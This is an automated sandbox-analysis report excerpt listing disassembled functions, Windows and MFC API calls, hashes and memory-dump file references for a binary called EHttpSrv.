                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1236#3990#578#774
                                                                                                                • String ID: ...
                                                                                                                • API String ID: 899038673-440645147
                                                                                                                • Opcode ID: 28ee0e0e95ed9453771ffe66ed81ba7c4483bbcdf2d3f5ce2050e615fe0b29e5
                                                                                                                • Instruction ID: 5373712dfce97079d76891927ad7678fd32071b7dc647f24b25153347c72ce09
                                                                                                                • Opcode Fuzzy Hash: 28ee0e0e95ed9453771ffe66ed81ba7c4483bbcdf2d3f5ce2050e615fe0b29e5
                                                                                                                • Instruction Fuzzy Hash: DDF06DB5108A40EFD305DF04CD84B2ABBE8FB88B25F008E2CF456823E0DB3C5A04CA42
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcsstr
                                                                                                                • String ID: 0$DELETE$DELETE=1$TiH
                                                                                                                • API String ID: 2735924446-925229115
                                                                                                                • Opcode ID: 68c5d955a3c88ee057bc51f0b690206c4601981c66816eccda9a2ea4ed6d696d
                                                                                                                • Instruction ID: 36bfe8ecc8532c90e75d599914e160e591052902f4073c0fc9fa8b5ab0026c70
                                                                                                                • Opcode Fuzzy Hash: 68c5d955a3c88ee057bc51f0b690206c4601981c66816eccda9a2ea4ed6d696d
                                                                                                                • Instruction Fuzzy Hash: CD91A4B1A006149FCB10CF98EC80B9AB7B4EF54314F8482EDEA05A7352D7789E85CF55
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20404CB0: wcscpy_s.MSVCR80 ref: 20404CD7
                                                                                                                  • Part of subcall function 20404CB0: wcsncpy_s.MSVCR80 ref: 20404CEA
                                                                                                                • wcsstr.MSVCR80 ref: 2042F1A7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_swcsncpy_swcsstr
                                                                                                                • String ID: 0$DELETE$DELETE=1$TiH
                                                                                                                • API String ID: 311962889-925229115
                                                                                                                • Opcode ID: 6de001f378f2d674e41ac09f3baf5954175bde3fd077e12621cfe321a923b03b
                                                                                                                • Instruction ID: c816f1638251860e255fec58d209106db8c5ff8e578f00fddaf8b93408f4d45d
                                                                                                                • Opcode Fuzzy Hash: 6de001f378f2d674e41ac09f3baf5954175bde3fd077e12621cfe321a923b03b
                                                                                                                • Instruction Fuzzy Hash: E99182B5A00619DFCB20CF94DD80B99B7B5BF88204F9482E9EA0967341D734AF45CF65
                                                                                                                APIs
                                                                                                                • #1176.MFC80U(FEEA6C22,-00003A6C,-00003AB4,?,?,2047F4A8,000000FF,2044F9B2,-00003AB4,?), ref: 20463F8E
                                                                                                                • #764.MFC80U(?), ref: 20463FCA
                                                                                                                • #764.MFC80U(?), ref: 20463FDB
                                                                                                                • #764.MFC80U(?), ref: 20463FEC
                                                                                                                • #764.MFC80U(?), ref: 20463FFD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$#1176
                                                                                                                • String ID:
                                                                                                                • API String ID: 987861311-0
                                                                                                                • Opcode ID: 14f07787d7d781585720ef2c76eb071abde77c01d8e2852b6f52fc6dd90be62f
                                                                                                                • Instruction ID: a98070125c487795d5e1c1e41b76c1b437769026aba7d230c424ffc06d12d48c
                                                                                                                • Opcode Fuzzy Hash: 14f07787d7d781585720ef2c76eb071abde77c01d8e2852b6f52fc6dd90be62f
                                                                                                                • Instruction Fuzzy Hash: 2E419E71A043459BC714DFA8C8C0B9AB3F5AFA5A48F40C92CF92487255F739EA09CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042D280: #354.MFC80U(00000097,20428001,FEEA6C22,20428001,000000FF,20479D18,000000FF,20422C46,20428001,000000FF,FEEA6C22,?,?,?,2047B870,000000FF), ref: 2042D2AD
                                                                                                                • #416.MFC80U(?,?,FEEA6C22,00000000,?,?,2047D8E4,000000FF,20462057,?,00000000,00000000,00000000,00000000,0000015E,00000000), ref: 2046C5D8
                                                                                                                  • Part of subcall function 2045CF80: #530.MFC80U(FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22,?,?,?,2047BED4), ref: 2045CFB1
                                                                                                                  • Part of subcall function 2045CF80: #6003.MFC80U(00000000,000000FF,FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22), ref: 2045CFCD
                                                                                                                  • Part of subcall function 20423810: #572.MFC80U(FEEA6C22,20428001,00000000,2047A038,000000FF,20422C5E,20428085,20428001,000000FF,FEEA6C22,?,?,?,2047B870,000000FF,20428001), ref: 20423837
                                                                                                                • #563.MFC80U(?,?,?,?,FEEA6C22,00000000,?,?,2047D8E4,000000FF,20462057,?,00000000,00000000,00000000,00000000), ref: 2046C63B
                                                                                                                • #563.MFC80U(?,?,?,?,FEEA6C22,00000000,?,?,2047D8E4,000000FF,20462057,?,00000000,00000000,00000000,00000000), ref: 2046C64B
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U(?,FEEA6C22,00000000,?,00000000,?,2047AE6F,000000FF,20472632,?), ref: 20430DFC
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E0A
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U ref: 20430E17
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E25
                                                                                                                  • Part of subcall function 20430DC0: LoadCursorW.USER32(00000000,00007F89), ref: 20430EA4
                                                                                                                  • Part of subcall function 20430DC0: SetRectEmpty.USER32(?), ref: 20430F17
                                                                                                                • #1079.MFC80U(?,?,?,?,?,?,?,?,?,FEEA6C22,00000000,?,?,2047D8E4,000000FF,20462057), ref: 2046C6BE
                                                                                                                • LoadAcceleratorsW.USER32(?,0000008A), ref: 2046C6CC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#557#563Load$#1079#354#416#530#572#6003AcceleratorsCursorEmptyRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 117230559-0
                                                                                                                • Opcode ID: f28c4c780984babebea40927c8fc153bc9f58949aae5e3684a3fe37845274eea
                                                                                                                • Instruction ID: 8df188cfc0f7d2dff96fac6e1b3f3a4b29b502d6c609d554b63601a0c70ab361
                                                                                                                • Opcode Fuzzy Hash: f28c4c780984babebea40927c8fc153bc9f58949aae5e3684a3fe37845274eea
                                                                                                                • Instruction Fuzzy Hash: B6412B71509B808ED310CF74D544B9BFBE4AFA5B08F048E4DE4DA97251C778A508CBA3
                                                                                                                APIs
                                                                                                                • GetCurrentObject.GDI32(?,00000006), ref: 204314A2
                                                                                                                • GetObjectW.GDI32(00000000,0000005C,?), ref: 204314BA
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 20431543
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 20431553
                                                                                                                • DeleteObject.GDI32(00000000), ref: 2043155A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$CreateCurrentDeleteFontIndirectSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 50039150-0
                                                                                                                • Opcode ID: 026ec79d7094d8a6f952af61633666c1d8a61d2f72d75d7ce869e004ac234820
                                                                                                                • Instruction ID: d9b3a9d93c16308a6b1df22556706bd8d4e25d073b5324bc4cf5619c2a00a30a
                                                                                                                • Opcode Fuzzy Hash: 026ec79d7094d8a6f952af61633666c1d8a61d2f72d75d7ce869e004ac234820
                                                                                                                • Instruction Fuzzy Hash: 8921043140C740ABC211CFA48954B6B7BD4AFDEB4CF20A91CFA8697361DB2CC9058793
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 20443383
                                                                                                                • #310.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,2047C8A1), ref: 204433DF
                                                                                                                • #4026.MFC80U(00000176), ref: 204433F3
                                                                                                                • #578.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,2047C8A1), ref: 2044340B
                                                                                                                  • Part of subcall function 2042E670: #6751.MFC80U(00000000,?,2042E5B8,00000000,FEEA6C22), ref: 2042E688
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044345B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6751$#310#314#4026#578
                                                                                                                • String ID:
                                                                                                                • API String ID: 1182657103-0
                                                                                                                • Opcode ID: 919f7780caee2980bc3da968e62253433011368395cdbebddbc3a6bb4ace46c1
                                                                                                                • Instruction ID: d5c34774d3e3678e067be1a01ecc7778953f0c800ade90182d4a99d713b34071
                                                                                                                • Opcode Fuzzy Hash: 919f7780caee2980bc3da968e62253433011368395cdbebddbc3a6bb4ace46c1
                                                                                                                • Instruction Fuzzy Hash: B1318C316087419BD314CF54D884BAABBE0FBA4B29F10CB2DF8A5436E0DB399904CA46
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 040aff806755fcecff898535f29387a8eec72c5b727a23081639e353423ce75a
                                                                                                                • Instruction ID: cdf0b8556220d5f65de270d08de19bbd4e4139c6ff79a35e881a18613564584c
                                                                                                                • Opcode Fuzzy Hash: 040aff806755fcecff898535f29387a8eec72c5b727a23081639e353423ce75a
                                                                                                                • Instruction Fuzzy Hash: 1E114C716006108BD730DF95C880A5773F6AB88310F25997DDD4A87210D73DFD49DBA2
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #3064memset$#6361
                                                                                                                • String ID:
                                                                                                                • API String ID: 4293083676-0
                                                                                                                • Opcode ID: b92684f67381bc14c3d4f75ce0dc2221cd5d245a442cc12f69b557ce1c2757f0
                                                                                                                • Instruction ID: 0702784574e55f6291f664e765b2f929f8af4fcd1af1c7acafbc4c6a93329a04
                                                                                                                • Opcode Fuzzy Hash: b92684f67381bc14c3d4f75ce0dc2221cd5d245a442cc12f69b557ce1c2757f0
                                                                                                                • Instruction Fuzzy Hash: 0A112670709B408BE720ABA4D825B9B77F27F60B08F11C41ED556572A0DBBDA4818791
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,2046787F), ref: 2041E00B
                                                                                                                • #764.MFC80U(?,?,2046787F), ref: 2041E024
                                                                                                                • #764.MFC80U(?,?,2046787F), ref: 2041E03D
                                                                                                                • #764.MFC80U(?,?,2046787F), ref: 2041E056
                                                                                                                • #764.MFC80U(?,?,2046787F), ref: 2041E06F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 5cdd4422dfb11c58f9158799d8e4986ffe300afca717e2e9f41fc0aaa154c452
                                                                                                                • Instruction ID: a45c504ce9664a0af5def6404d9244c2f5a598a96061cf544b85d7e9c55dab90
                                                                                                                • Opcode Fuzzy Hash: 5cdd4422dfb11c58f9158799d8e4986ffe300afca717e2e9f41fc0aaa154c452
                                                                                                                • Instruction Fuzzy Hash: 2511A8F1D01B108BC6719F5B9981817FBF9BFA46007949D1EE18AC2A20D3B9F4848F51
                                                                                                                APIs
                                                                                                                • #764.MFC80U(00000000,?,00000001,?,?,20462D01), ref: 204129EE
                                                                                                                • #764.MFC80U(20462D01,?,00000001,?,?,20462D01), ref: 204129FE
                                                                                                                • #764.MFC80U(?,?,00000001,?,?,20462D01), ref: 20412A0E
                                                                                                                • #764.MFC80U(?,?,00000001,?,?,20462D01), ref: 20412A1E
                                                                                                                • #764.MFC80U(?,?,?,20462D01), ref: 20412A37
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 3601c3366580da7bba9342901ffdafa328c0f1da6d4fcc88da08de05a8ecddd4
                                                                                                                • Instruction ID: 3b3e0f5020365ef418d4e4a8d25d9515d89a794e690bf130ed1b31d4d5b1dce2
                                                                                                                • Opcode Fuzzy Hash: 3601c3366580da7bba9342901ffdafa328c0f1da6d4fcc88da08de05a8ecddd4
                                                                                                                • Instruction Fuzzy Hash: B8014CF2E007129BD6319EE49E41A57F3A86F10584B04C828E919E7600E63DF9A4CAE2
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 204385CB
                                                                                                                • #2366.MFC80U(00000000), ref: 204385D2
                                                                                                                • #2648.MFC80U(00000000), ref: 204385F6
                                                                                                                • #2648.MFC80U(00000000), ref: 20438601
                                                                                                                • SendMessageW.USER32(?,0000004E,00000000,00000000), ref: 20438616
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2648$#2366MessageParentSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 618804366-0
                                                                                                                • Opcode ID: cd4e2aa80283902dd658a5a69b0aa514c0ff9a341a78e5f375abb5c017dea3f9
                                                                                                                • Instruction ID: 6b27879f19521a8650714e7d031745b5b5e2419dbccdf476676730fdb6f9a243
                                                                                                                • Opcode Fuzzy Hash: cd4e2aa80283902dd658a5a69b0aa514c0ff9a341a78e5f375abb5c017dea3f9
                                                                                                                • Instruction Fuzzy Hash: 12011EB26043049BCB04DFA8C895A6BB7A9FB88714F10896DFD598B680DB75E904CB91
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22,?,?,00000000,20479929,000000FF,2045A0D6,00000000), ref: 2045A318
                                                                                                                • #6232.MFC80U(00000001), ref: 2045A32A
                                                                                                                • #4026.MFC80U(?,00000001), ref: 2045A357
                                                                                                                • #5803.MFC80U(000003FC,?,?,00000001), ref: 2045A369
                                                                                                                • #578.MFC80U(000003FC,?,?,00000001), ref: 2045A37A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#4026#578#5803#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 1453617869-0
                                                                                                                • Opcode ID: f98708d631100de7f398db51057dde8a6b5c887a45a5df038a9467d1af8224b6
                                                                                                                • Instruction ID: 21f2922d4e9f85d5c6767d76ba903275e276ecd49b4a8d21b2b4aacec48a433f
                                                                                                                • Opcode Fuzzy Hash: f98708d631100de7f398db51057dde8a6b5c887a45a5df038a9467d1af8224b6
                                                                                                                • Instruction Fuzzy Hash: 86012D75108A01AFD314DF58DC94BABB7E4FB84719F108A2EF5A6477A0DF39A908CB41
                                                                                                                APIs
                                                                                                                • #1921.MFC80U(FEEA6C22,?,?,?,00000000,2047A52C,000000FF,204560BC), ref: 2045D66F
                                                                                                                • DestroyAcceleratorTable.USER32(?), ref: 2045D67B
                                                                                                                  • Part of subcall function 2045D000: free.MSVCR80 ref: 2045D058
                                                                                                                  • Part of subcall function 2045D000: #6003.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D06E
                                                                                                                  • Part of subcall function 2045D000: #722.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D07D
                                                                                                                • #658.MFC80U(?,?,?,00000000,2047A52C,000000FF,204560BC), ref: 2045D69C
                                                                                                                • #651.MFC80U(?,?,?,00000000,2047A52C,000000FF,204560BC), ref: 2045D6A8
                                                                                                                • #605.MFC80U(?,?,?,00000000,2047A52C,000000FF,204560BC), ref: 2045D6B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1921#6003#605#651#658#722AcceleratorDestroyTablefree
                                                                                                                • String ID:
                                                                                                                • API String ID: 3189193943-0
                                                                                                                • Opcode ID: 074fffb333143394038fb696c20330bed956ab92d4bab4a04e213e4ffb927463
                                                                                                                • Instruction ID: 6615b9cedfd4d8d6a70bf06ef8f864a55d9fe342bd741bf547e0d738b5018bca
                                                                                                                • Opcode Fuzzy Hash: 074fffb333143394038fb696c20330bed956ab92d4bab4a04e213e4ffb927463
                                                                                                                • Instruction Fuzzy Hash: 6501A1701087808FD315CF28C895BAABBE4FB90618F50891DF096832A1DB786509CBD2
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22,00000000,FEEA6C22), ref: 20459477
                                                                                                                • #6232.MFC80U(00000001), ref: 204594A1
                                                                                                                • #4026.MFC80U(?,00000001), ref: 204594BA
